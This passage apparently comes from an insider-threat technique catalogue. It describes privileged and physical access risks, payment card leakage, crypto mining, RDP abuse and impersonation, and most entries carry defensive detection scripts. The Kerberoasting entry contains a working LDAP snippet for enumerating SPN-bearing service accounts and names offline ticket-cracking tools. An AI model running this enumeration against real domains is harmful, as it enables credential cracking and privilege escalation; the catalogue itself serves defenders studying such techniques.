Subjects with access to production and pre-production environments—whether as users, developers, or administrators—hold the potential to exploit or compromise highly sensitive organizational assets. Production environments, which host live applications and databases, are critical to business operations and often contain real-time data, including proprietary business information and personally identifiable information (PII). A subject with access to these systems can manipulate operational processes, exfiltrate sensitive data, introduce malicious code, or degrade system performance.

 

Pre-production environments, used for testing, staging, and development, often replicate production systems, though they may contain anonymized or less protected data. Despite this, pre-production environments can still house sensitive configurations, APIs, and testing data that can be exploited. A subject with access to these environments may uncover system vulnerabilities, access sensitive credentials, or introduce code that could be escalated into the production environment.

 

In both environments, privileged access provides a direct pathway to the underlying infrastructure, system configurations, logs, and application code. For example, administrative access allows manipulation of security policies, user permissions, and system-level access controls. Similarly, access to development environments can provide insights into source code, configuration management, and test data—all of which could be leveraged to further insider activity.

 

Subjects with privileged access to critical environments are positioned not only to exploit system vulnerabilities or bypass security controls but also to become targets for recruitment by external actors seeking unauthorized access to sensitive information. These individuals may be approached or coerced to intentionally compromise the environment, escalate privileges, or exfiltrate data on behalf of malicious third parties.

 

Given the sensitivity of these environments, subjects with privileged access represent a significant insider threat to the integrity of the organization's systems and data. Their position allows them to manipulate or exfiltrate sensitive information, either independently or in collaboration with external actors. The risk is further amplified as these individuals may be vulnerable to recruitment or coercion, making them potential participants in malicious activities that compromise organizational security. As insiders, their knowledge and access make them a critical point of concern for both data protection and operational security.

ME024.005 Access to Physical Spaces

Subjects with authorized access to sensitive physical spaces—such as secure offices, executive areas, data centers, SCIFs (Sensitive Compartmented Information Facilities), R&D labs, or restricted zones in critical infrastructure—pose an increased insider threat due to their physical proximity to sensitive assets, systems, and information.

 

Such spaces often contain high-value materials or information, including printed sensitive documents, whiteboard plans, authentication devices (e.g., smartcards or tokens), and unattended workstations. A subject with physical presence in these locations may observe confidential conversations, access sensitive output, or physically interact with devices outside of typical security monitoring.

 

This type of access can be leveraged to:

  • Obtain unattended or discarded sensitive information, such as printouts, notes, or credentials left on desks.
  • Observe operational activity or decision-making, gaining insight into projects, personnel, or internal dynamics.
  • Access unlocked devices or improperly secured terminals, allowing direct system interaction or credential harvesting.
  • Bypass digital controls via physical means, such as tailgating into secure spaces or using misappropriated access cards.
  • Covertly install or remove equipment, such as data exfiltration tools, recording devices, or physical implants.
  • Eavesdrop on confidential conversations, either directly or through concealed recording equipment, enabling the collection of sensitive verbal disclosures, strategic discussions, or authentication procedures.

 

Subjects in roles that involve frequent presence in sensitive locations—such as cleaning staff, security personnel, on-site engineers, or facility contractors—may operate outside the scope of standard digital access control and may not be fully visible to security teams focused on network activity.

 

Importantly, individuals with this kind of access are also potential targets for recruitment or coercion by external threat actors seeking insider assistance. The ability to physically access secure environments and passively gather high-value information makes them attractive assets in coordinated attempts to obtain or compromise protected information.

 

The risk is magnified in organizations lacking comprehensive physical access policies, surveillance, or cross-referencing of physical and digital access activity. When unmonitored, physical access can provide a silent pathway to support insider operations without leaving traditional digital footprints.

ME025.002 Leadership and Influence Over Direct Reports

A subject with a people management role holds significant influence over their direct reports, which can be leveraged to conduct insider activities. As a leader, the subject is in a unique position to shape team dynamics, direct tasks, and control the flow of information within their team. This authority presents several risks, as the subject may:

 

  • Influence team members to inadvertently or deliberately carry out tasks that contribute to the subject’s insider objectives. For instance, a manager might ask a subordinate to access or move sensitive data under the guise of a legitimate business need or direct them to work on projects that will inadvertently support a malicious agenda.
  • Exert pressure on employees to bypass security protocols, disregard organizational policies, or perform actions that could compromise the organization’s integrity. For example, a manager might encourage their team to take shortcuts in security or compliance checks to meet deadlines or targets.
  • Control access to sensitive information, either by virtue of the manager’s role or through the information shared within their team. A people manager may have direct visibility into highly sensitive internal communications, strategic plans, and confidential projects, which can be leveraged for malicious purposes.
  • Isolate team members or limit their exposure to security training, potentially creating vulnerabilities within the team that could be exploited. By controlling the flow of information or limiting access to security awareness resources, a manager can enable an environment conducive to insider threats.
  • Recruit or hire individuals within their team or external candidates who are susceptible to manipulation or willing to participate in insider activities. A subject in a management role could use their hiring influence to bring in new team members who align with or are manipulated into assisting in the subject's illicit plans, increasing the risk of coordinated insider actions.

 

In addition to these immediate risks, subjects in people management roles may also have the ability to recruit individuals from their team for insider activities, subtly influencing them to support illicit actions or help cover up their activities. By fostering a sense of loyalty or manipulating interpersonal relationships, the subject may encourage compliance with unethical actions, making it more difficult for others to detect or challenge the behavior.

 

Given the central role that managers play in shaping team culture and operational practices, the risks posed by a subject in a management position are compounded by their ability to both directly influence the behavior of others and manipulate processes for personal or malicious gain.

IF022.004 Payment Card Data Leakage

A subject with access to payment environments or transactional data may deliberately or inadvertently leak sensitive payment card information. Payment Card Data Leakage refers to the unauthorized exposure, transmission, or exfiltration of data governed by the Payment Card Industry Data Security Standard (PCI DSS). This includes both Cardholder Data (CHD)—such as the Primary Account Number (PAN), cardholder name, expiration date, and service code—and Sensitive Authentication Data (SAD), which encompasses full track data, card verification values (e.g., CVV2, CVC2, CID), and PIN-related information.

 

Subjects with privileged, technical, or unsupervised access to point-of-sale systems, payment gateways, backend databases, or log repositories may mishandle or deliberately exfiltrate CHD or SAD. In some scenarios, insiders may exploit access to system-level data stores, intercept transactional payloads, or scrape logs that improperly store SAD in violation of PCI DSS mandates. This may include exporting payment data in plaintext, capturing full card data from logs, or replicating data to unmonitored environments for later retrieval.

 

Weak controls, such as the absence of data encryption, improper tokenization of PANs, misconfigured retention policies, or lack of field-level access restrictions, can facilitate misuse by insiders. In some cases, access may be shared or escalated informally, bypassing formal entitlement reviews or just-in-time provisioning protocols. These gaps in security can be manipulated by a subject seeking to leak or profit from payment card data.

 

Insiders may also use legitimate business tools—such as reporting platforms or data exports—to intentionally bypass obfuscation mechanisms or deliver raw payment data to unauthorized recipients. Additionally, compromised service accounts or insider-created backdoors can provide long-term persistence for continued exfiltration of sensitive data.

 

Data loss involving CHD or SAD often triggers mandatory breach disclosures, regulatory scrutiny, and severe financial penalties. Such incidents also pose reputational risks, particularly when the loss undermines consumer trust or payment processing agreements. In high-volume environments, even small-scale leaks can result in widespread exposure of customer data and fraud.

MT005.002 Corporate Espionage

A third party private organization deploys an individual to a target organization to covertly steal confidential or classified information or gain strategic access for its own benefit.

MT005.003 Financial Desperation

A subject facing financial difficulties attempts to resolve their situation by exploiting their access to or knowledge of the organization. This may involve selling access or information to a third party or conspiring with others to cause harm to the organization for financial gain.

MT005.001 Speculative Corporate Espionage

A subject covertly collects confidential or classified information, or gains access, with the intent to sell it to a third party private organization.

IF012.002 Statements On Personal Social Media

A subject uses personal social media accounts to post statements or other media that can result in brand damage through association between the subject and their employer.

IF012.001 Statements On Organization's Social Media

A subject uses existing access to social media accounts owned by the organization to post statements or other media that can result in brand damage.

IF015.001 Theft of a Corporate Laptop

A subject steals a corporate laptop belonging to an organization.

PR024.001 Privilege Escalation through Kerberoasting

Kerberoasting is a technique that can be exploited by a subject to escalate privileges and gain unauthorized access to sensitive systems within a network. From the perspective of a subject—who may be a low-privileged user with legitimate access to the network—the attack takes advantage of weaknesses in the Kerberos authentication protocol used by Active Directory (AD).

 

Kerberos Authentication Process

In a Kerberos-based network (like those using Active Directory), clients—users, computers, or services—authenticate to services using service tickets. When a client wants to access a service (e.g., a file server or email service), it requests a service ticket from the Ticket Granting Service (TGS). This request is made using the Service Principal Name (SPN) of the target service.

The TGS then issues a service ticket encrypted with a key derived from the password of the service account associated with that SPN. The client presents this ticket to the service to authenticate.

 

Subject Requesting Service Tickets

A subject, typically a domain user with limited privileges, can exploit this process by requesting service tickets for service accounts running critical or high-privilege services, such as domain controllers or admin-level service accounts. These accounts are often associated with SPNs in Active Directory.

The subject can identify these SPNs—often for high-value targets like SQL Server, Exchange, or other administrative services—by querying the domain or using enumeration tools. Once these SPNs are identified, the subject can request service tickets for these service accounts from the TGS.
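
As a simplified illustration of the SPN discovery step only (ticket requests and offline cracking are normally performed with dedicated tooling), a low-privileged domain user could enumerate accounts carrying SPNs over LDAP. The hostname, credentials, and base DN below are placeholders, and the ldap3 Python package is assumed:

# Sketch: list user accounts that have a servicePrincipalName set (Kerberoastable accounts).
from ldap3 import Server, Connection, NTLM, SUBTREE

server = Server("dc01.corp.example.com")
conn = Connection(server, user="CORP\\lowpriv.user", password="placeholder",
                  authentication=NTLM, auto_bind=True)

conn.search(search_base="DC=corp,DC=example,DC=com",
            search_filter="(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))",
            search_scope=SUBTREE,
            attributes=["sAMAccountName", "servicePrincipalName"])

for entry in conn.entries:
    print(entry.sAMAccountName.value, entry.servicePrincipalName.values)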

 

Cracking the Service Tickets

The key aspect of the Kerberoasting attack is that each service ticket is encrypted with a key derived from the service account's password. If a service account uses a weak, easily guessable password, the subject can extract the ticket and attempt to crack it offline using tools like Hashcat or John the Ripper.

Since these passwords are typically not subject to regular user password policies (i.e., they may not be as complex), weak or easily cracked passwords are a prime target for the subject.

 

Privilege Escalation and Unauthorized Access

Once the subject successfully cracks the password of a service account, they can use the credentials to gain elevated privileges. For example:

  • If the cracked service account belongs to a high-privilege service (e.g., Domain Admins or Enterprise Admins), the subject can use these credentials to access systems, services, and parts of the network they would not ordinarily be permitted to access. This could include sensitive files, servers, or even Active Directory itself.
  • The subject can use these credentials to move laterally within the network, expanding their access to additional systems that are typically restricted to high-privilege accounts.
  • With administrative-level access, the subject can make changes to critical systems, alter configurations, or install malicious software. This could lead to further insider events, such as data exfiltration, malware deployment, or even persistent backdoors for ongoing unauthorized access.

 

Reconnaissance and Exploitation

The subject can perform additional reconnaissance within the network to identify other high-privilege accounts and services associated with service accounts. They can continue requesting service tickets for additional SPNs and cracking any other weak passwords they find, gradually escalating their access to more critical systems.

With broad access, the subject may also attempt to manipulate access controls, elevate privileges further, or carry out malicious actions undetected. This provides a potential stepping stone to more serious insider threats and an expanded attack surface for other actors.

IF009.005 Anti-Sleep Software

The subject installs or enables software, scripts, or hardware devices designed to prevent systems from automatically locking, logging out, or entering sleep mode. This unauthorized action deliberately subverts security controls intended to protect unattended systems from unauthorized access.

 

Characteristics

  • Circumvents policies enforcing session locks, idle timeouts, and mandatory logout periods.
  • May involve third-party applications ("caffeine" tools), anti-idle scripts, or physical devices such as USB mouse jigglers.
  • Typically deployed without organizational approval or awareness.
  • Leaves systems continuously unlocked and accessible, undermining endpoint security and physical safeguards.
  • Renders full disk encryption protections ineffective while the system remains powered and unlocked.
  • Creates opportunities for unauthorized access, data exfiltration, or device compromise by malicious insiders or third parties.

 

Example Scenario

A subject installs unauthorized anti-sleep software on a corporate laptop to prevent automatic locking during idle periods. As a result, the device remains accessible even when left unattended in unsecured environments such as cafes, airports, or shared workspaces. This action bypasses mandatory screen-lock policies and renders full disk encryption protections ineffective, exposing sensitive organizational data to theft or compromise by malicious third parties who can physically access the unattended device.
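
On Windows hosts, one simple way to surface anti-sleep tooling is to review active power requests, which list the processes currently preventing sleep or display timeout. The sketch below wraps the built-in powercfg /requests command (which requires an elevated prompt); the allow-list of expected requestors is a placeholder assumption.

```python
# Minimal sketch: list processes holding Windows power requests (i.e., preventing
# sleep or display timeout) and flag anything not on an expected allow-list.
# Requires an elevated prompt; the allow-list below is a placeholder.
import subprocess

EXPECTED = {"audiodg.exe", "teams.exe"}   # illustrative allow-list, adjust to the environment

output = subprocess.run(
    ["powercfg", "/requests"],
    capture_output=True,
    text=True,
    check=True,
).stdout

for line in output.splitlines():
    line = line.strip().lower()
    # powercfg groups requestors under DISPLAY/SYSTEM/AWAYMODE headings; process
    # entries typically contain an executable path.
    if ".exe" in line and not any(name in line for name in EXPECTED):
        print(f"Unexpected power request holder: {line}")
```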

IF001.006Exfiltration via Generative AI Platform

The subject transfers sensitive, proprietary, or classified information into an external generative AI platform through text input, file upload, API integration, or embedded application features. This results in uncontrolled data exposure to third-party environments outside organizational governance, potentially violating confidentiality, regulatory, or contractual obligations.

 

Characteristics

  • Involves manual or automated transfer of sensitive data through:
      • Web-based AI interfaces (e.g., ChatGPT, Claude, Gemini).
      • Upload of files (e.g., PDFs, DOCX, CSVs) for summarization, parsing, or analysis.
      • API calls to generative AI services from scripts or third-party SaaS integrations.
      • Embedded AI features inside productivity suites (e.g., Copilot in Microsoft 365, Gemini in Google Workspace).
  • Subjects may act with or without malicious intent—motivated by efficiency, convenience, curiosity, or deliberate exfiltration.
  • Data transmitted may be stored, cached, logged, or used for model retraining, depending on provider-specific terms of service and API configurations.
  • Exfiltration through generative AI channels often evades traditional DLP (Data Loss Prevention) patterns due to novel data formats, variable input methods, and encrypted traffic.

 

Example Scenario

A subject copies sensitive internal financial projections into a public generative AI chatbot to "optimize" executive presentation materials. The AI provider, per its terms of use, retains inputs for service improvement and model fine-tuning. Sensitive data—now stored outside corporate control—becomes vulnerable to exposure through potential data breaches, subpoena, insider misuse at the service provider, or future unintended model outputs.
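
Where web proxy or DNS logs are available, a first-pass control is to flag requests to known generative AI endpoints and correlate them with outbound data volumes. The sketch below assumes a CSV proxy log export with user, url, and bytes_out columns; the domain list, column names, and size threshold are illustrative assumptions that must reflect the platforms and log schema actually in use.

```python
# Minimal sketch: flag large uploads to generative AI platforms in a proxy log.
# Assumes a CSV export with "user", "url", and "bytes_out" columns; the domain
# list, column names, and size threshold are illustrative placeholders.
import csv

AI_DOMAINS = ("chat.openai.com", "chatgpt.com", "claude.ai", "gemini.google.com")
UPLOAD_THRESHOLD = 100_000  # bytes sent in a single request (tune to baseline)

with open("proxy_log.csv", newline="") as fh:   # placeholder log export
    for row in csv.DictReader(fh):
        url = row.get("url", "")
        bytes_out = int(row.get("bytes_out", 0) or 0)
        if any(domain in url for domain in AI_DOMAINS) and bytes_out >= UPLOAD_THRESHOLD:
            print(f'{row.get("user")} sent {bytes_out} bytes to {url}')
```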

IF009.006Installing Crypto Mining Software

The subject installs and operates unauthorized cryptocurrency mining software on organizational systems, leveraging compute, network, and energy resources for personal financial gain. This activity subverts authorized system use policies, degrades operational performance, increases attack surface, and introduces external control risks.

 

Characteristics

  • Deploys CPU-intensive or GPU-intensive processes (e.g., xmrig, ethminer, phoenixminer, nicehash) on endpoints, servers, or cloud infrastructure without approval.
  • May use containerized deployments (Docker), low-footprint mining scripts, browser-based JavaScript miners, or stealth binaries disguised as legitimate processes.
  • Often configured to throttle resource usage during business hours to evade human and telemetry detection.
  • Establishes persistent outbound network connections to mining pools (e.g., via Stratum mining protocol over TCP/SSL).
  • Frequently disables system security features (e.g., Anti-Virus (AV)/Endpoint Detection & Response (EDR) agents, power-saving modes) to maintain uninterrupted mining sessions.
  • Represents not only misuse of resources but also creates unauthorized outbound communication channels that bypass standard network controls.

 

Example Scenario

A subject installs a customized xmrig Monero mining binary onto under-monitored R&D servers by side-loading it via a USB device. The miner operates in "stealth mode," hiding its process name within legitimate system services and throttling CPU usage to 60% during business hours. Off-peak hours show 95% CPU utilization with persistent outbound TCP traffic to an external mining pool over a non-standard port. The mining operation remains active for six months, leading to significant compute degradation, unplanned electricity costs, and unmonitored external network connections that could facilitate broader compromise.
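
Two of the characteristics above lend themselves to simple host-level baselining: sustained CPU utilization outside business hours and long-lived outbound connections on Stratum-style ports. The sketch below uses the Python psutil library on a single host; the port list, the off-hours window, and the CPU threshold are illustrative assumptions to be tuned against the environment's baseline.

```python
# Minimal sketch: flag sustained off-hours CPU usage and outbound connections on
# ports commonly associated with Stratum mining pools. Uses psutil; the port
# list, off-hours window, and threshold are illustrative assumptions.
from datetime import datetime
import psutil

SUSPECT_PORTS = {3333, 4444, 5555, 14444}   # ports often used by Stratum pools (illustrative)
OFF_HOURS_CPU_THRESHOLD = 80.0              # percent, tune to the host's baseline

now = datetime.now()
off_hours = now.hour < 7 or now.hour > 19   # assumed business hours of 07:00-19:00

cpu = psutil.cpu_percent(interval=5)
if off_hours and cpu >= OFF_HOURS_CPU_THRESHOLD:
    print(f"Sustained off-hours CPU usage: {cpu:.1f}%")

for conn in psutil.net_connections(kind="tcp"):
    if conn.status == psutil.CONN_ESTABLISHED and conn.raddr and conn.raddr.port in SUSPECT_PORTS:
        proc = psutil.Process(conn.pid).name() if conn.pid else "unknown"
        print(f"Outbound connection to {conn.raddr.ip}:{conn.raddr.port} from {proc}")
```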

PR026.001Remote Desktop (RDP) Access on Windows Systems

The subject initiates configuration changes to enable Remote Desktop Protocol (RDP) or Remote Assistance on a Windows system, typically through the System Properties dialog, registry modifications, or local group policy. This behavior may indicate preparatory actions to grant unauthorized remote access to the endpoint, whether to an external actor, co-conspirator, or secondary account.

 

Characteristics

Subject opens the Remote tab within the System Properties dialog (SystemPropertiesRemote.exe) and enables:

  • Remote Assistance
  • Remote Desktop

 

May configure additional RDP-related settings such as:

  • Allowing connections from any version of RDP clients (less secure)
  • Adding specific users to the Remote Desktop Users group
  • Modifying Group Policy to allow RDP access

 

Often accompanied by:

  • Firewall rule changes to allow inbound RDP (TCP 3389)
  • Creation of local accounts or service accounts with RDP permissions
  • Disabling sleep, lock, or idle timeout settings to keep the system continuously accessible

 

In some cases, used to stage access prior to file exfiltration, remote control handoff, or backdoor persistence.
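
A low-cost host check for the configuration changes above (assuming a Windows endpoint and local administrative rights) is to read the registry value that controls whether inbound Remote Desktop connections are allowed. The sketch below covers only that registry portion using Python's standard winreg module and is illustrative rather than a complete audit; reviewing the Remote Desktop Users group and firewall rules would complete the picture.

```python
# Minimal sketch: check whether inbound Remote Desktop connections are enabled on
# a Windows host by reading fDenyTSConnections (0 = RDP allowed, 1 = denied).
# Uses the standard-library winreg module; Windows only.
import winreg

key_path = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
    deny, _ = winreg.QueryValueEx(key, "fDenyTSConnections")

if deny == 0:
    print("Remote Desktop connections are ENABLED on this host")
else:
    print("Remote Desktop connections are denied (default)")
```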

 

Example Scenario

A subject accesses the Remote tab via SystemPropertiesRemote.exe and enables Remote Desktop, selecting the “Allow connections from computers running any version of Remote Desktop” option. They add a personal email-based Microsoft account to the Remote Desktop Users group. No help desk ticket or change request is submitted. Over the following days, successful RDP logins are observed from an IP address outside of corporate VPN boundaries, correlating with a data transfer spike.

PR026.002Remote Desktop Web Access

The subject initiates or configures access to a system using Remote Desktop or Remote Assistance via a web browser interface, often through third-party tools or services (e.g., LogMeIn, AnyDesk, Chrome Remote Desktop, Microsoft RD Web Access). This behavior may indicate preparatory actions to facilitate unauthorized remote access, either for a co-conspirator, a secondary device, or future remote exfiltration. Unlike traditional RDP clients, browser-based remote access methods may bypass endpoint controls and often operate over HTTPS, making detection more difficult with traditional monitoring.

 

This method may be used when traditional RDP clients are blocked or monitored, or when the subject intends to evade installed software policies and gain access through externally hosted portals. While some web-based tools require agents to be installed on the target machine, others permit remote viewing or interaction without full installation, particularly when configured in advance.
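
Because even browser-initiated sessions usually rely on a resident agent or helper process on the target machine, a complementary host check is to look for those processes. The sketch below uses the Python psutil library; the process-name markers are illustrative assumptions and should be replaced with the remote-access tools relevant to the environment.

```python
# Minimal sketch: look for resident remote-access agent processes on a host.
# Uses psutil; the process-name markers are illustrative and environment-specific.
import psutil

REMOTE_ACCESS_MARKERS = {"anydesk", "teamviewer", "logmein", "remoting_host"}  # illustrative

for proc in psutil.process_iter(["name", "exe"]):
    name = (proc.info.get("name") or "").lower()
    if any(marker in name for marker in REMOTE_ACCESS_MARKERS):
        print(f"Possible remote-access agent: {proc.info.get('name')} ({proc.info.get('exe')})")
```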

PR027.002Impersonation via Collaboration and Communication Tools

The subject creates, modifies, or misuses digital identities within internal communication or collaboration environments—such as email, chat platforms (e.g., Slack, Microsoft Teams), or shared document spaces—to impersonate trusted individuals or roles. This tactic is used to gain access, issue instructions, extract sensitive data, or manipulate workflows under the guise of legitimacy.

 

Impersonation in this context can be achieved through:

  • Lookalike email addresses (e.g., spoofed domains or typosquatting).
  • Cloned display names in collaboration tools.
  • Shared calendar invites or chats initiated under false authority.
  • Use of compromised or unused accounts from real employees, contractors, or vendors.

 

The impersonation may be part of early-stage insider coordination, privilege escalation attempts, or subtle reconnaissance designed to map workflows, bypass controls, or test detection thresholds.

 

Example Scenarios

  • A subject registers a secondary internal email alias (john.smyth@corp-secure.com) closely resembling that of a senior executive and uses it to request financial data from junior employees.
  • A subject joins a sensitive Slack channel using a display name that mimics another department member and quietly monitors ongoing discussions related to mergers and acquisitions activity.
  • A compromised service account is used by an insider to initiate SharePoint document shares with external parties, appearing as a legitimate internal action.
  • The subject impersonates an IT support contact via Teams or email to socially engineer MFA tokens or password resets.
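
Lookalike addresses and display names of the kind used in these scenarios can often be surfaced with a simple string-similarity pass against the official directory. The sketch below uses Python's standard difflib module; the directory entries, the candidate address, and the similarity threshold are illustrative assumptions.

```python
# Minimal sketch: flag addresses or display names that closely resemble, but do
# not match, entries in the official directory. Uses difflib; the directory
# entries and threshold are illustrative placeholders.
from difflib import SequenceMatcher

DIRECTORY = {"john.smith@corp-secure.com", "jane.doe@corp-secure.com"}  # illustrative
THRESHOLD = 0.9

def similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

def flag_lookalike(candidate: str) -> None:
    for legit in DIRECTORY:
        score = similarity(candidate, legit)
        if candidate.lower() != legit and score >= THRESHOLD:
            print(f"Possible lookalike: {candidate} resembles {legit} (score {score:.2f})")

flag_lookalike("john.smyth@corp-secure.com")   # near-miss of a directory address
```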